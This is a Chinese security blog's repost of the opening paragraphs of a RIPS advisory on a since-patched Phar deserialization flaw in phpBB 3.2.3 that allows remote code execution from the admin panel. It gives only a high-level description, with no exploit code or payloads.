歡迎光臨
我們一直在努力

phpBB 3.2.3: Phar Deserialization to RCE

原文出處:https://blog.ripstech.com/2018/phpbb3-phar-deserialization-to-remote-code-execution/

phpBB is one of the oldest and most popular board software. If an attacker aims to take over a board running phpBB3, he will usually attempt to gain access to the admin control panel by means of bruteforcing, phishing or XSS vulnerabilities in plugins that the target site has installed. But plugins cannot be installed directly in the admin panel and there is no other feature that can be abused by administrators to execute arbitrary PHP code. However, the vulnerability described here allows the attacker to break out of the admin panel, execute arbitrary PHP code on the underlying server and then to perform a full site takeover.

The issue in the phpBB3 code base (300 KLOC) is a Phar deserialization vulnerability. It was fixed in version 3.2.4. Our leading SAST solution RIPS automatically detected this vulnerability in 3 minutes scan time.

文章圖片來源:https://blog.ripstech.com/2018/phpbb3-phar-deserialization-to-remote-code-execution/
前言引用來源:https://blog.ripstech.com/2018/phpbb3-phar-deserialization-to-remote-code-execution/

-------------------
如果你認同我們每日分享的文章,請幫我們按個讚並且點擊追蹤「搶先看」,讓我們提供最新消息給您!您的分享及點讚,是我們持續推廣資訊安全最大的動力來源。
https://www.facebook.com/LonelyPoPo/

贊(0) 打賞
轉載請附上作者連結:波波的寂寞世界 » phpBB 3.2.3: Phar Deserialization to RCE

波波的寂寞世界

Facebook聯繫我們

覺得文章有用,請作者喝杯咖啡

掃一掃打賞作者狗糧